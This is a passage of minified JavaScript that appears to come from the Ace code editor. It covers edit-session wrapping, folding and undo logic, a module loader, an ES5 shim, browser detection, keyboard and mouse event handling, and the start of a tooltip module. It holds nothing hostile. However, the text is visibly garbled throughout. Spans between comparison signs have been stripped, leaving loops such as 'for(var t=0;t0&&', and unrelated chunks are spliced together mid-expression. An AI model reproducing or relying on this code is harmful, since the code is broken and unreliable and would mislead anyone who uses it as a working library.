"+t,""),this._signal("changeBreakpoint",{})},this.getBreakpoints=function(){return this.$breakpoints},this.setBreakpoints=function(e){this.$breakpoints=[];for(var t=0;t0&&(r=!!n.charAt(t-1).match(this.tokenRe)),r||(r=!!n.charAt(t).match(this.tokenRe));if(r)var i=this.tokenRe;else if(/^\s+$/.test(n.slice(t-1,t+1)))var i=/\s/;else var i=this.nonTokenRe;var s=t;if(s>0){do s--;while(s>=0&&n.charAt(s).match(i));s++}var o=t;while(oe&&(e=t.screenWidth)}),this.lineWidgetWidth=e},this.$computeWidth=function(e){if(this.$modified||e){this.$modified=!1;if(this.$useWrapMode)return this.screenWidth=this.$wrapLimit;var t=this.doc.getAllLines(),n=this.$rowLengthCache,r=0,i=0,s=this.$foldData[i],o=s?s.start.row:Infinity,u=t.length;for(var a=0;ao){a=s.end.row+1;if(a>=u)break;s=this.$foldData[i++],o=s?s.start.row:Infinity}n[a]==null&&(n[a]=this.$getStringScreenWidth(t[a])[0]),n[a]>r&&(r=n[a])}this.screenWidth=r}},this.getLine=function(e){return this.doc.getLine(e)},this.getLines=function(e,t){return this.doc.getLines(e,t)},this.getLength=function(){return this.doc.getLength()},this.getTextRange=function(e){return this.doc.getTextRange(e||this.selection.getRange())},this.insert=function(e,t){return this.doc.insert(e,t)},this.remove=function(e){return this.doc.remove(e)},this.removeFullLines=function(e,t){return this.doc.removeFullLines(e,t)},this.undoChanges=function(e,t){if(!e.length)return;this.$fromUndo=!0;var n=null;for(var r=e.length-1;r!=-1;r--){var i=e[r];i.group=="doc"?(this.doc.revertDeltas(i.deltas),n=this.$getUndoSelection(i.deltas,!0,n)):i.deltas.forEach(function(e){this.addFolds(e.folds)},this)}return this.$fromUndo=!1,n&&this.$undoSelect&&!t&&this.selection.setSelectionRange(n),n},this.redoChanges=function(e,t){if(!e.length)return;this.$fromUndo=!0;var n=null;for(var r=0;re.end.column&&(s.start.column+=u),s.end.row==e.end.row&&s.end.column>e.end.column&&(s.end.column+=u)),o&&s.start.row>=e.end.row&&(s.start.row+=o,s.end.row+=o)}s.end=this.insert(s.start,r);if(i.length){var a=e.start,l=s.start,o=l.row-a.row,u=l.column-a.column;this.addFolds(i.map(function(e){return e=e.clone(),e.start.row==a.row&&(e.start.column+=u),e.end.row==a.row&&(e.end.column+=u),e.start.row+=o,e.end.row+=o,e}))}return s},this.indentRows=function(e,t,n){n=n.replace(/\t/g,this.getTabString());for(var r=e;r<=t;r++)this.doc.insertInLine({row:r,column:0},n)},this.outdentRows=function(e){var t=e.collapseRows(),n=new f(0,0,0,0),r=this.getTabSize();for(var i=t.start.row;i<=t.end.row;++i){var s=this.getLine(i);n.start.row=i,n.end.row=i;for(var o=0;o0){var r=this.getRowFoldEnd(t+n);if(r>this.doc.getLength()-1)return 0;var i=r-t}else{e=this.$clipRowToDocument(e),t=this.$clipRowToDocument(t);var i=t-e+1}var s=new f(e,0,t,Number.MAX_VALUE),o=this.getFoldsInRange(s).map(function(e){return e=e.clone(),e.start.row+=i,e.end.row+=i,e}),u=n==0?this.doc.getLines(e,t):this.doc.removeFullLines(e,t);return this.doc.insertFullLines(e+i,u),o.length&&this.addFolds(o),i},this.moveLinesUp=function(e,t){return this.$moveLines(e,t,-1)},this.moveLinesDown=function(e,t){return this.$moveLines(e,t,1)},this.duplicateLines=function(e,t){return this.$moveLines(e,t,0)},this.$clipRowToDocument=function(e){return Math.max(0,Math.min(e,this.doc.getLength()-1))},this.$clipColumnToRow=function(e,t){return t<0?0:Math.min(this.doc.getLine(e).length,t)},this.$clipPositionToDocument=function(e,t){t=Math.max(0,t);if(e<0)e=0,t=0;else{var n=this.doc.getLength();e>=n?(e=n-1,t=this.doc.getLine(n-1).length):t=Math.min(this.doc.getLine(e).length,t)}return{row:e,column:t}},this.$clipRangeToDocument=function(e){e.start.row<0?(e.start.row=0,e.start.column=0):e.start.column=this.$clipColumnToRow(e.start.row,e.start.column);var t=this.doc.getLength()-1;return e.end.row>t?(e.end.row=t,e.end.column=this.doc.getLine(t).length):e.end.column=this.$clipColumnToRow(e.end.row,e.end.column),e},this.$wrapLimit=80,this.$useWrapMode=!1,this.$wrapLimitRange={min:null,max:null},this.setUseWrapMode=function(e){if(e!=this.$useWrapMode){this.$useWrapMode=e,this.$modified=!0,this.$resetRowCache(0);if(e){var t=this.getLength();this.$wrapData=Array(t),this.$updateWrapData(0,t-1)}this._signal("changeWrapMode")}},this.getUseWrapMode=function(){return this.$useWrapMode},this.setWrapLimitRange=function(e,t){if(this.$wrapLimitRange.min!==e||this.$wrapLimitRange.max!==t)this.$wrapLimitRange={min:e,max:t},this.$modified=!0,this.$useWrapMode&&this._signal("changeWrapMode")},this.adjustWrapLimit=function(e,t){var n=this.$wrapLimitRange;n.max<0&&(n={min:t,max:t});var r=this.$constrainWrapLimit(e,n.min,n.max);return r!=this.$wrapLimit&&r>1?(this.$wrapLimit=r,this.$modified=!0,this.$useWrapMode&&(this.$updateWrapData(0,this.getLength()-1),this.$resetRowCache(0),this._signal("changeWrapLimit")),!0):!1},this.$constrainWrapLimit=function(e,t,n){return t&&(e=Math.max(t,e)),n&&(e=Math.min(n,e)),e},this.getWrapLimit=function(){return this.$wrapLimit},this.setWrapLimit=function(e){this.setWrapLimitRange(e,e)},this.getWrapLimitRange=function(){return{min:this.$wrapLimitRange.min,max:this.$wrapLimitRange.max}},this.$updateInternalDataOnChange=function(e){var t=this.$useWrapMode,n=e.action,r=e.start,i=e.end,s=r.row,o=i.row,u=o-s,a=null;this.$updating=!0;if(u!=0)if(n==="remove"){this[t?"$wrapData":"$rowLengthCache"].splice(s,u);var f=this.$foldData;a=this.getFoldsInRange(e),this.removeFolds(a);var l=this.getFoldLine(i.row),c=0;if(l){l.addRemoveChars(i.row,i.column,r.column-i.column),l.shiftRow(-u);var h=this.getFoldLine(s);h&&h!==l&&(h.merge(l),l=h),c=f.indexOf(l)+1}for(c;c=i.row&&l.shiftRow(-u)}o=s}else{var p=Array(u);p.unshift(s,0);var d=t?this.$wrapData:this.$rowLengthCache;d.splice.apply(d,p);var f=this.$foldData,l=this.getFoldLine(s),c=0;if(l){var v=l.range.compareInside(r.row,r.column);v==0?(l=l.split(r.row,r.column),l&&(l.shiftRow(u),l.addRemoveChars(o,0,i.column-r.column))):v==-1&&(l.addRemoveChars(s,0,i.column-r.column),l.shiftRow(u)),c=f.indexOf(l)+1}for(c;c=s&&l.shiftRow(u)}}else{u=Math.abs(e.start.column-e.end.column),n==="remove"&&(a=this.getFoldsInRange(e),this.removeFolds(a),u=-u);var l=this.getFoldLine(s);l&&l.addRemoveChars(s,r.column,u)}return t&&this.$wrapData.length!=this.doc.getLength()&&console.error("doc.getLength() and $wrapData.length have to be the same!"),this.$updating=!1,t?this.$updateWrapData(s,o):this.$updateRowLengthCache(s,o),a},this.$updateRowLengthCache=function(e,t,n){this.$rowLengthCache[e]=null,this.$rowLengthCache[t]=null},this.$updateWrapData=function(e,t){var r=this.doc.getAllLines(),i=this.getTabSize(),s=this.$wrapData,o=this.$wrapLimit,a,f,l=e;t=Math.min(t,r.length-1);while(l<=t)f=this.getFoldLine(l,f),f?(a=[],f.walk(function(e,t,i,s){var o;if(e!=null){o=this.$getDisplayTokens(e,a.length),o[0]=n;for(var f=1;fr-b){var w=a+r-b;if(e[w-1]>=p&&e[w]>=p){y(w);continue}if(e[w]==n||e[w]==u){for(w;w!=a-1;w--)if(e[w]==n)break;if(w>a){y(w);continue}w=a+r;for(w;w>2)),a-1);while(w>E&&e[w]E&&e[w]E&&e[w]==l)w--}else while(w>E&&e[w]E){ +(function(){function o(n){var i=e;n&&(e[n]||(e[n]={}),i=e[n]);if(!i.define||!i.define.packaged)t.original=i.define,i.define=t,i.define.packaged=!0;if(!i.require||!i.require.packaged)r.original=i.require,i.require=r,i.require.packaged=!0}var ACE_NAMESPACE = "ace",e=function(){return this}();!e&&typeof window!="undefined"&&(e=window);if(!ACE_NAMESPACE&&typeof requirejs!="undefined")return;var t=function(e,n,r){if(typeof e!="string"){t.original?t.original.apply(this,arguments):(console.error("dropping module because define wasn't a string."),console.trace());return}arguments.length==2&&(r=n),t.modules[e]||(t.payloads[e]=r,t.modules[e]=null)};t.modules={},t.payloads={};var n=function(e,t,n){if(typeof t=="string"){var i=s(e,t);if(i!=undefined)return n&&n(),i}else if(Object.prototype.toString.call(t)==="[object Array]"){var o=[];for(var u=0,a=t.length;u1&&u(t,"")>-1&&(a=RegExp(this.source,r.replace.call(o(this),"g","")),r.replace.call(e.slice(t.index),a,function(){for(var e=1;et.index&&this.lastIndex--}return t},s||(RegExp.prototype.test=function(e){var t=r.exec.call(this,e);return t&&this.global&&!t[0].length&&this.lastIndex>t.index&&this.lastIndex--,!!t})}),ace.define("ace/lib/es5-shim",["require","exports","module"],function(e,t,n){function r(){}function w(e){try{return Object.defineProperty(e,"sentinel",{}),"sentinel"in e}catch(t){}}function H(e){return e=+e,e!==e?e=0:e!==0&&e!==1/0&&e!==-1/0&&(e=(e>0||-1)*Math.floor(Math.abs(e))),e}function B(e){var t=typeof e;return e===null||t==="undefined"||t==="boolean"||t==="number"||t==="string"}function j(e){var t,n,r;if(B(e))return e;n=e.valueOf;if(typeof n=="function"){t=n.call(e);if(B(t))return t}r=e.toString;if(typeof r=="function"){t=r.call(e);if(B(t))return t}throw new TypeError}Function.prototype.bind||(Function.prototype.bind=function(t){var n=this;if(typeof n!="function")throw new TypeError("Function.prototype.bind called on incompatible "+n);var i=u.call(arguments,1),s=function(){if(this instanceof s){var e=n.apply(this,i.concat(u.call(arguments)));return Object(e)===e?e:this}return n.apply(t,i.concat(u.call(arguments)))};return n.prototype&&(r.prototype=n.prototype,s.prototype=new r,r.prototype=null),s});var i=Function.prototype.call,s=Array.prototype,o=Object.prototype,u=s.slice,a=i.bind(o.toString),f=i.bind(o.hasOwnProperty),l,c,h,p,d;if(d=f(o,"__defineGetter__"))l=i.bind(o.__defineGetter__),c=i.bind(o.__defineSetter__),h=i.bind(o.__lookupGetter__),p=i.bind(o.__lookupSetter__);if([1,2].splice(0).length!=2)if(!function(){function e(e){var t=new Array(e+2);return t[0]=t[1]=0,t}var t=[],n;t.splice.apply(t,e(20)),t.splice.apply(t,e(26)),n=t.length,t.splice(5,0,"XXX"),n+1==t.length;if(n+1==t.length)return!0}())Array.prototype.splice=function(e,t){var n=this.length;e>0?e>n&&(e=n):e==void 0?e=0:e<0&&(e=Math.max(n+e,0)),e+ta)for(h=l;h--;)this[f+h]=this[a+h];if(s&&e===c)this.length=c,this.push.apply(this,i);else{this.length=c+s;for(h=0;h>>0;if(a(t)!="[object Function]")throw new TypeError;while(++s>>0,s=Array(i),o=arguments[1];if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");for(var u=0;u>>0,s=[],o,u=arguments[1];if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");for(var f=0;f>>0,s=arguments[1];if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");for(var o=0;o>>0,s=arguments[1];if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");for(var o=0;o>>0;if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");if(!i&&arguments.length==1)throw new TypeError("reduce of empty array with no initial value");var s=0,o;if(arguments.length>=2)o=arguments[1];else do{if(s in r){o=r[s++];break}if(++s>=i)throw new TypeError("reduce of empty array with no initial value")}while(!0);for(;s>>0;if(a(t)!="[object Function]")throw new TypeError(t+" is not a function");if(!i&&arguments.length==1)throw new TypeError("reduceRight of empty array with no initial value");var s,o=i-1;if(arguments.length>=2)s=arguments[1];else do{if(o in r){s=r[o--];break}if(--o<0)throw new TypeError("reduceRight of empty array with no initial value")}while(!0);do o in this&&(s=t.call(void 0,s,r[o],o,n));while(o--);return s});if(!Array.prototype.indexOf||[0,1].indexOf(1,2)!=-1)Array.prototype.indexOf=function(t){var n=g&&a(this)=="[object String]"?this.split(""):F(this),r=n.length>>>0;if(!r)return-1;var i=0;arguments.length>1&&(i=H(arguments[1])),i=i>=0?i:Math.max(0,r+i);for(;i>>0;if(!r)return-1;var i=r-1;arguments.length>1&&(i=Math.min(i,H(arguments[1]))),i=i>=0?i:r-Math.abs(i);for(;i>=0;i--)if(i in n&&t===n[i])return i;return-1};Object.getPrototypeOf||(Object.getPrototypeOf=function(t){return t.__proto__||(t.constructor?t.constructor.prototype:o)});if(!Object.getOwnPropertyDescriptor){var y="Object.getOwnPropertyDescriptor called on a non-object: ";Object.getOwnPropertyDescriptor=function(t,n){if(typeof t!="object"&&typeof t!="function"||t===null)throw new TypeError(y+t);if(!f(t,n))return;var r,i,s;r={enumerable:!0,configurable:!0};if(d){var u=t.__proto__;t.__proto__=o;var i=h(t,n),s=p(t,n);t.__proto__=u;if(i||s)return i&&(r.get=i),s&&(r.set=s),r}return r.value=t[n],r}}Object.getOwnPropertyNames||(Object.getOwnPropertyNames=function(t){return Object.keys(t)});if(!Object.create){var b;Object.prototype.__proto__===null?b=function(){return{__proto__:null}}:b=function(){var e={};for(var t in e)e[t]=null;return e.constructor=e.hasOwnProperty=e.propertyIsEnumerable=e.isPrototypeOf=e.toLocaleString=e.toString=e.valueOf=e.__proto__=null,e},Object.create=function(t,n){var r;if(t===null)r=b();else{if(typeof t!="object")throw new TypeError("typeof prototype["+typeof t+"] != 'object'");var i=function(){};i.prototype=t,r=new i,r.__proto__=t}return n!==void 0&&Object.defineProperties(r,n),r}}if(Object.defineProperty){var E=w({}),S=typeof document=="undefined"||w(document.createElement("div"));if(!E||!S)var x=Object.defineProperty}if(!Object.defineProperty||x){var T="Property description must be an object: ",N="Object.defineProperty called on non-object: ",C="getters & setters can not be defined on this javascript engine";Object.defineProperty=function(t,n,r){if(typeof t!="object"&&typeof t!="function"||t===null)throw new TypeError(N+t);if(typeof r!="object"&&typeof r!="function"||r===null)throw new TypeError(T+r);if(x)try{return x.call(Object,t,n,r)}catch(i){}if(f(r,"value"))if(d&&(h(t,n)||p(t,n))){var s=t.__proto__;t.__proto__=o,delete t[n],t[n]=r.value,t.__proto__=s}else t[n]=r.value;else{if(!d)throw new TypeError(C);f(r,"get")&&l(t,n,r.get),f(r,"set")&&c(t,n,r.set)}return t}}Object.defineProperties||(Object.defineProperties=function(t,n){for(var r in n)f(n,r)&&Object.defineProperty(t,r,n[r]);return t}),Object.seal||(Object.seal=function(t){return t}),Object.freeze||(Object.freeze=function(t){return t});try{Object.freeze(function(){})}catch(k){Object.freeze=function(t){return function(n){return typeof n=="function"?n:t(n)}}(Object.freeze)}Object.preventExtensions||(Object.preventExtensions=function(t){return t}),Object.isSealed||(Object.isSealed=function(t){return!1}),Object.isFrozen||(Object.isFrozen=function(t){return!1}),Object.isExtensible||(Object.isExtensible=function(t){if(Object(t)===t)throw new TypeError;var n="";while(f(t,n))n+="?";t[n]=!0;var r=f(t,n);return delete t[n],r});if(!Object.keys){var L=!0,A=["toString","toLocaleString","valueOf","hasOwnProperty","isPrototypeOf","propertyIsEnumerable","constructor"],O=A.length;for(var M in{toString:null})L=!1;Object.keys=function I(e){if(typeof e!="object"&&typeof e!="function"||e===null)throw new TypeError("Object.keys called on a non-object");var I=[];for(var t in e)f(e,t)&&I.push(t);if(L)for(var n=0,r=O;n=0?parseFloat((i.match(/(?:MSIE |Trident\/[0-9]+[\.0-9]+;.*rv:)([0-9]+[\.0-9]+)/)||[])[1]):parseFloat((i.match(/(?:Trident\/[0-9]+[\.0-9]+;.*rv:)([0-9]+[\.0-9]+)/)||[])[1]),t.isOldIE=t.isIE&&t.isIE<9,t.isGecko=t.isMozilla=(window.Controllers||window.controllers)&&window.navigator.product==="Gecko",t.isOldGecko=t.isGecko&&parseInt((i.match(/rv:(\d+)/)||[])[1],10)<4,t.isOpera=window.opera&&Object.prototype.toString.call(window.opera)=="[object Opera]",t.isWebKit=parseFloat(i.split("WebKit/")[1])||undefined,t.isChrome=parseFloat(i.split(" Chrome/")[1])||undefined,t.isAIR=i.indexOf("AdobeAIR")>=0,t.isIPad=i.indexOf("iPad")>=0,t.isTouchPad=i.indexOf("TouchPad")>=0,t.isChromeOS=i.indexOf(" CrOS ")>=0}),ace.define("ace/lib/event",["require","exports","module","ace/lib/keys","ace/lib/useragent"],function(e,t,n){"use strict";function a(e,t,n){var a=u(t);if(!i.isMac&&s){t.getModifierState&&(t.getModifierState("OS")||t.getModifierState("Win"))&&(a|=8);if(s.altGr){if((3&a)==3)return;s.altGr=0}if(n===18||n===17){var f="location"in t?t.location:t.keyLocation;if(n===17&&f===1)s[n]==1&&(o=t.timeStamp);else if(n===18&&a===3&&f===2){var l=t.timeStamp-o;l<50&&(s.altGr=!0)}}}n in r.MODIFIER_KEYS&&(n=-1),a&8&&n>=91&&n<=93&&(n=-1);if(!a&&n===13){var f="location"in t?t.location:t.keyLocation;if(f===3){e(t,a,-n);if(t.defaultPrevented)return}}if(i.isChromeOS&&a&8){e(t,a,n);if(t.defaultPrevented)return;a&=-9}return!!a||n in r.FUNCTION_KEYS||n in r.PRINTABLE_KEYS?e(t,a,n):!1}function f(){s=Object.create(null)}var r=e("./keys"),i=e("./useragent"),s=null,o=0;t.addListener=function(e,t,n){if(e.addEventListener)return e.addEventListener(t,n,!1);if(e.attachEvent){var r=function(){n.call(e,window.event)};n._wrapper=r,e.attachEvent("on"+t,r)}},t.removeListener=function(e,t,n){if(e.removeEventListener)return e.removeEventListener(t,n,!1);e.detachEvent&&e.detachEvent("on"+t,n._wrapper||n)},t.stopEvent=function(e){return t.stopPropagation(e),t.preventDefault(e),!1},t.stopPropagation=function(e){e.stopPropagation?e.stopPropagation():e.cancelBubble=!0},t.preventDefault=function(e){e.preventDefault?e.preventDefault():e.returnValue=!1},t.getButton=function(e){return e.type=="dblclick"?0:e.type=="contextmenu"||i.isMac&&e.ctrlKey&&!e.altKey&&!e.shiftKey?2:e.preventDefault?e.button:{1:0,2:2,4:1}[e.button]},t.capture=function(e,n,r){function i(e){n&&n(e),r&&r(e),t.removeListener(document,"mousemove",n,!0),t.removeListener(document,"mouseup",i,!0),t.removeListener(document,"dragstart",i,!0)}return t.addListener(document,"mousemove",n,!0),t.addListener(document,"mouseup",i,!0),t.addListener(document,"dragstart",i,!0),i},t.addTouchMoveListener=function(e,n){if("ontouchmove"in e){var r,i;t.addListener(e,"touchstart",function(e){var t=e.changedTouches[0];r=t.clientX,i=t.clientY}),t.addListener(e,"touchmove",function(e){var t=1,s=e.changedTouches[0];e.wheelX=-(s.clientX-r)/t,e.wheelY=-(s.clientY-i)/t,r=s.clientX,i=s.clientY,n(e)})}},t.addMouseWheelListener=function(e,n){"onmousewheel"in e?t.addListener(e,"mousewheel",function(e){var t=8;e.wheelDeltaX!==undefined?(e.wheelX=-e.wheelDeltaX/t,e.wheelY=-e.wheelDeltaY/t):(e.wheelX=0,e.wheelY=-e.wheelDelta/t),n(e)}):"onwheel"in e?t.addListener(e,"wheel",function(e){var t=.35;switch(e.deltaMode){case e.DOM_DELTA_PIXEL:e.wheelX=e.deltaX*t||0,e.wheelY=e.deltaY*t||0;break;case e.DOM_DELTA_LINE:case e.DOM_DELTA_PAGE:e.wheelX=(e.deltaX||0)*5,e.wheelY=(e.deltaY||0)*5}n(e)}):t.addListener(e,"DOMMouseScroll",function(e){e.axis&&e.axis==e.HORIZONTAL_AXIS?(e.wheelX=(e.detail||0)*5,e.wheelY=0):(e.wheelX=0,e.wheelY=(e.detail||0)*5),n(e)})},t.addMultiMouseDownListener=function(e,n,r,s){function c(e){t.getButton(e)!==0?o=0:e.detail>1?(o++,o>4&&(o=1)):o=1;if(i.isIE){var c=Math.abs(e.clientX-u)>5||Math.abs(e.clientY-a)>5;if(!f||c)o=1;f&&clearTimeout(f),f=setTimeout(function(){f=null},n[o-1]||600),o==1&&(u=e.clientX,a=e.clientY)}e._clicks=o,r[s]("mousedown",e);if(o>4)o=0;else if(o>1)return r[s](l[o],e)}function h(e){o=2,f&&clearTimeout(f),f=setTimeout(function(){f=null},n[o-1]||600),r[s]("mousedown",e),r[s](l[o],e)}var o=0,u,a,f,l={2:"dblclick",3:"tripleclick",4:"quadclick"};Array.isArray(e)||(e=[e]),e.forEach(function(e){t.addListener(e,"mousedown",c),i.isOldIE&&t.addListener(e,"dblclick",h)})};var u=!i.isMac||!i.isOpera||"KeyboardEvent"in window?function(e){return 0|(e.ctrlKey?1:0)|(e.altKey?2:0)|(e.shiftKey?4:0)|(e.metaKey?8:0)}:function(e){return 0|(e.metaKey?1:0)|(e.altKey?2:0)|(e.shiftKey?4:0)|(e.ctrlKey?8:0)};t.getModifierString=function(e){return r.KEY_MODS[u(e)]},t.addCommandKeyListener=function(e,n){var r=t.addListener;if(i.isOldGecko||i.isOpera&&!("KeyboardEvent"in window)){var o=null;r(e,"keydown",function(e){o=e.keyCode}),r(e,"keypress",function(e){return a(n,e,o)})}else{var u=null;r(e,"keydown",function(e){s[e.keyCode]=(s[e.keyCode]||0)+1;var t=a(n,e,e.keyCode);return u=e.defaultPrevented,t}),r(e,"keypress",function(e){u&&(e.ctrlKey||e.altKey||e.shiftKey||e.metaKey)&&(t.stopEvent(e),u=null)}),r(e,"keyup",function(e){s[e.keyCode]=null}),s||(f(),r(window,"focus",f))}};if(typeof window=="object"&&window.postMessage&&!i.isOldIE){var l=1;t.nextTick=function(e,n){n=n||window;var r="zero-timeout-message-"+l;t.addListener(n,"message",function i(s){s.data==r&&(t.stopPropagation(s),t.removeListener(n,"message",i),e())}),n.postMessage(r,"*")}}t.nextFrame=typeof window=="object"&&(window.requestAnimationFrame||window.mozRequestAnimationFrame||window.webkitRequestAnimationFrame||window.msRequestAnimationFrame||window.oRequestAnimationFrame),t.nextFrame?t.nextFrame=t.nextFrame.bind(window):t.nextFrame=function(e){setTimeout(e,17)}}),ace.define("ace/lib/lang",["require","exports","module"],function(e,t,n){"use strict";t.last=function(e){return e[e.length-1]},t.stringReverse=function(e){return e.split("").reverse().join("")},t.stringRepeat=function(e,t){var n="";while(t>0){t&1&&(n+=e);if(t>>=1)e+=e}return n};var r=/^\s\s*/,i=/\s\s*$/;t.stringTrimLeft=function(e){return e.replace(r,"")},t.stringTrimRight=function(e){return e.replace(i,"")},t.copyObject=function(e){var t={};for(var n in e)t[n]=e[n];return t},t.copyArray=function(e){var t=[];for(var n=0,r=e.length;n=53&&O(),O()},I=o.delayedCall(j,50);r.addListener(n,"compositionstart",B),i.isGecko?r.addListener(n,"text",function(){I.schedule()}):(r.addListener(n,"keyup",function(){I.schedule()}),r.addListener(n,"keydown",function(){I.schedule()})),r.addListener(n,"compositionend",F),this.getElement=function(){return n},this.setReadOnly=function(e){n.readOnly=e},this.onContextMenu=function(e){L=!0,b(t.selection.isEmpty()),t._emit("nativecontextmenu",{target:t,domEvent:e}),this.moveToMouse(e,!0)},this.moveToMouse=function(e,o){if(!o&&i.isOldIE)return;p||(p=n.style.cssText),n.style.cssText=(o?"z-index:100000;":"")+"height:"+n.style.height+";"+(i.isIE?"opacity:0.1;":"");var u=t.container.getBoundingClientRect(),a=s.computedStyle(t.container),f=u.top+(parseInt(a.borderTopWidth)||0),l=u.left+(parseInt(u.borderLeftWidth)||0),c=u.bottom-f-n.clientHeight-2,h=function(e){n.style.left=e.clientX-l-2+"px",n.style.top=Math.min(e.clientY-f-2,c)+"px"};h(e);if(e.type!="mousedown")return;t.renderer.$keepTextAreaAtCursor&&(t.renderer.$keepTextAreaAtCursor=null),clearTimeout(q),i.isWin&&!i.isOldIE&&r.capture(t.container,h,R)},this.onContextMenuClose=R;var q,U=function(e){t.textInput.onContextMenu(e),R()};r.addListener(n,"mouseup",U),r.addListener(n,"mousedown",function(e){e.preventDefault(),R()}),r.addListener(t.renderer.scroller,"contextmenu",U),r.addListener(n,"contextmenu",U)};t.TextInput=f}),ace.define("ace/mouse/default_handlers",["require","exports","module","ace/lib/dom","ace/lib/event","ace/lib/useragent"],function(e,t,n){"use strict";function u(e){e.$clickSelection=null;var t=e.editor;t.setDefaultHandler("mousedown",this.onMouseDown.bind(e)),t.setDefaultHandler("dblclick",this.onDoubleClick.bind(e)),t.setDefaultHandler("tripleclick",this.onTripleClick.bind(e)),t.setDefaultHandler("quadclick",this.onQuadClick.bind(e)),t.setDefaultHandler("mousewheel",this.onMouseWheel.bind(e)),t.setDefaultHandler("touchmove",this.onTouchMove.bind(e));var n=["select","startSelect","selectEnd","selectAllEnd","selectByWordsEnd","selectByLinesEnd","dragWait","dragWaitEnd","focusWait"];n.forEach(function(t){e[t]=this[t]},this),e.selectByLines=this.extendSelectionBy.bind(e,"getLineRange"),e.selectByWords=this.extendSelectionBy.bind(e,"getWordRange")}function a(e,t,n,r){return Math.sqrt(Math.pow(n-e,2)+Math.pow(r-t,2))}function f(e,t){if(e.start.row==e.end.row)var n=2*t.column-e.start.column-e.end.column;else if(e.start.row==e.end.row-1&&!e.start.column&&!e.end.column)var n=t.column-4;else var n=2*t.row-e.start.row-e.end.row;return n<0?{cursor:e.start,anchor:e.end}:{cursor:e.end,anchor:e.start}}var r=e("../lib/dom"),i=e("../lib/event"),s=e("../lib/useragent"),o=0;(function(){this.onMouseDown=function(e){var t=e.inSelection(),n=e.getDocumentPosition();this.mousedownEvent=e;var r=this.editor,i=e.getButton();if(i!==0){var s=r.getSelectionRange(),o=s.isEmpty();r.$blockScrolling++,(o||i==1)&&r.selection.moveToPosition(n),r.$blockScrolling--,i==2&&r.textInput.onContextMenu(e.domEvent);return}this.mousedownEvent.time=Date.now();if(t&&!r.isFocused()){r.focus();if(this.$focusTimout&&!this.$clickSelection&&!r.inMultiSelectMode){this.setState("focusWait"),this.captureMouse(e);return}}return this.captureMouse(e),this.startSelect(n,e.domEvent._clicks>1),e.preventDefault()},this.startSelect=function(e,t){e=e||this.editor.renderer.screenToTextCoordinates(this.x,this.y);var n=this.editor;n.$blockScrolling++,this.mousedownEvent.getShiftKey()?n.selection.selectToPosition(e):t||n.selection.moveToPosition(e),t||this.select(),n.renderer.scroller.setCapture&&n.renderer.scroller.setCapture(),n.setStyle("ace_selecting"),this.setState("select"),n.$blockScrolling--},this.select=function(){var e,t=this.editor,n=t.renderer.screenToTextCoordinates(this.x,this.y);t.$blockScrolling++;if(this.$clickSelection){var r=this.$clickSelection.comparePoint(n);if(r==-1)e=this.$clickSelection.end;else if(r==1)e=this.$clickSelection.start;else{var i=f(this.$clickSelection,n);n=i.cursor,e=i.anchor}t.selection.setSelectionAnchor(e.row,e.column)}t.selection.selectToPosition(n),t.$blockScrolling--,t.renderer.scrollCursorIntoView()},this.extendSelectionBy=function(e){var t,n=this.editor,r=n.renderer.screenToTextCoordinates(this.x,this.y),i=n.selection[e](r.row,r.column);n.$blockScrolling++;if(this.$clickSelection){var s=this.$clickSelection.comparePoint(i.start),o=this.$clickSelection.comparePoint(i.end);if(s==-1&&o<=0){t=this.$clickSelection.end;if(i.end.row!=r.row||i.end.column!=r.column)r=i.start}else if(o==1&&s>=0){t=this.$clickSelection.start;if(i.start.row!=r.row||i.start.column!=r.column)r=i.end}else if(s==-1&&o==1)r=i.end,t=i.start;else{var u=f(this.$clickSelection,r);r=u.cursor,t=u.anchor}n.selection.setSelectionAnchor(t.row,t.column)}n.selection.selectToPosition(r),n.$blockScrolling--,n.renderer.scrollCursorIntoView()},this.selectEnd=this.selectAllEnd=this.selectByWordsEnd=this.selectByLinesEnd=function(){this.$clickSelection=null,this.editor.unsetStyle("ace_selecting"),this.editor.renderer.scroller.releaseCapture&&this.editor.renderer.scroller.releaseCapture()},this.focusWait=function(){var e=a(this.mousedownEvent.x,this.mousedownEvent.y,this.x,this.y),t=Date.now();(e>o||t-this.mousedownEvent.time>this.$focusTimout)&&this.startSelect(this.mousedownEvent.getDocumentPosition())},this.onDoubleClick=function(e){var t=e.getDocumentPosition(),n=this.editor,r=n.session,i=r.getBracketRange(t);i?(i.isEmpty()&&(i.start.column--,i.end.column++),this.setState("select")):(i=n.selection.getWordRange(t.row,t.column),this.setState("selectByWords")),this.$clickSelection=i,this.select()},this.onTripleClick=function(e){var t=e.getDocumentPosition(),n=this.editor;this.setState("selectByLines");var r=n.getSelectionRange();r.isMultiLine()&&r.contains(t.row,t.column)?(this.$clickSelection=n.selection.getLineRange(r.start.row),this.$clickSelection.end=n.selection.getLineRange(r.end.row).end):this.$clickSelection=n.selection.getLineRange(t.row),this.select()},this.onQuadClick=function(e){var t=this.editor;t.selectAll(),this.$clickSelection=t.getSelectionRange(),this.setState("selectAll")},this.onMouseWheel=function(e){if(e.getAccelKey())return;e.getShiftKey()&&e.wheelY&&!e.wheelX&&(e.wheelX=e.wheelY,e.wheelY=0);var t=e.domEvent.timeStamp,n=t-(this.$lastScrollTime||0),r=this.editor,i=r.renderer.isScrollableBy(e.wheelX*e.speed,e.wheelY*e.speed);if(i||n<200)return this.$lastScrollTime=t,r.renderer.scrollBy(e.wheelX*e.speed,e.wheelY*e.speed),e.stop()},this.onTouchMove=function(e){var t=e.domEvent.timeStamp,n=t-(this.$lastScrollTime||0),r=this.editor,i=r.renderer.isScrollableBy(e.wheelX*e.speed,e.wheelY*e.speed);if(i||n<200)return this.$lastScrollTime=t,r.renderer.scrollBy(e.wheelX*e.speed,e.wheelY*e.speed),e.stop()}}).call(u.prototype),t.DefaultHandlers=u}),ace.define("ace/tooltip",["require","exports","module","ace/lib/oop","ace/lib/dom"],function(e,t,n){"use strict";function s(e){this.isOpen=!1,this.$element=null,this.$parentNode=e}var r=e("./lib/oop"),i=e("./lib/dom");(function(){this.$init=function(){return this.$element=i.createElement("div"),this.$element.className="ace_tooltip",this.$element.style.display="none",this.$parentNode.appendChild(this.$element),this.$element},this.getElement=function(){return 